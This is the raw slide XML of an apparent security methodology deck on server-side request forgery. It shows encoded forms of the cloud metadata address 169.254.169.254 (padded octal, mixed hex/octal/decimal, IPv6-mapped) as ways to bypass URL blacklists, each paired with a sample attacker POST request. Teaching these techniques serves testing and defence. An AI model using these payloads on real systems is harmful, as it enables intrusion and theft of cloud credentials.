            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="611" name="Google Shape;611;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotted Octal With Padding</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.00376.000251.0000376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.00376.000251.0000376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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619" name="Google Shape;619;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0" name="Google Shape;620;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="621" name="Google Shape;621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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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2" name="Google Shape;622;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="623" name="Google Shape;623;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mix Them e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decimal Overflow + Hex + Octal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.254.0xa9.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.254.0xa9.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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631" name="Google Shape;631;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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2" name="Google Shape;632;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="633" name="Google Shape;633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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="635" name="Google Shape;635;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Convert Only Parts Of The Address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Octal + Hex + 2-Byte Wide Dotless Decimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0xfe.43518/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://0251.254.169.254</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Google Shape;641;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0xfe.43518/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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643" name="Google Shape;643;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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4" name="Google Shape;644;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;645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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;647;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="649" name="Google Shape;649;p7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22925" y="3110050"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4-Compatible Address</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;655;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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657" name="Google Shape;657;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;658;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="659" name="Google Shape;659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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Google Shape;660;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="661" name="Google Shape;661;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4-Mapped Address e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ffff:169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
